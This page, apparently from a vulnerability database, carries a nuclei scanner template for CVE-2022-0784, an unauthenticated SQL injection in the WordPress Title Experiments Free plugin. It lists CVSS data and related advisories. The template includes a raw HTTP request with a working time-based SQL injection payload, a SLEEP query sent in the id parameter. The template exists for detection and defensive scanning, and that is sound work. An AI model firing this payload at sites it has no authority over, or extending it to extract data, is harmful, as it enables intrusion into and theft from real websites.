Lucene search
K

WordPress Title Experiments Free <9.0.1 - SQL Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

WordPress Title Experiments Free <9.0.1 SQL Injection vulnerability allows arbitrary SQL queries execution and unauthorized access

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0784
28 Mar 202218:15
attackerkb
Circl
CVE-2022-0784
28 Mar 202222:41
circl
CNNVD
WordPress plugin Title Experiments Free SQL注入漏洞
28 Mar 202200:00
cnnvd
CNVD
WordPress Title Experiments Free plugin SQL注入漏洞
30 Mar 202200:00
cnvd
CVE
CVE-2022-0784
28 Mar 202217:23
cve
Cvelist
CVE-2022-0784 Title Experiments Free < 9.0.1 - Unauthenticated SQLi
28 Mar 202217:23
cvelist
NVD
CVE-2022-0784
28 Mar 202218:15
nvd
Patchstack
WordPress Title Experiments Free plugin <= 9.0 - Unauthenticated SQL Injection (SQLi) vulnerability
7 Mar 202200:00
patchstack
Prion
Sql injection
28 Mar 202218:15
prion
RedhatCVE
CVE-2022-0784
9 Jan 202610:45
redhatcve
Rows per page
id: CVE-2022-0784

info:
  name: WordPress Title Experiments Free <9.0.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update to the latest version of WordPress Title Experiments Free plugin (9.0.1 or higher) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
    - https://wordpress.org/plugins/wp-experiments-free/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0784
    - https://github.com/cyllective/CVEs
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0784
    cwe-id: CWE-89
    epss-score: 0.10352
    epss-percentile: 0.95142
    cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: title_experiments_free_project
    product: title_experiments_free
    framework: wordpress
  tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project,vkev,vuln

http:
  - raw:
      - |
        @timeout: 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{\"images\":")'
        condition: and
# digest: 4a0a004730450221008161a2280ba8acc65c582cd8d2dc0344781e94983570f83077bd1f39c475c26f0220384b55e0d120309995afcafc1d68e4d5472aab4805336f04b6a04881c2b82072:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.10352
19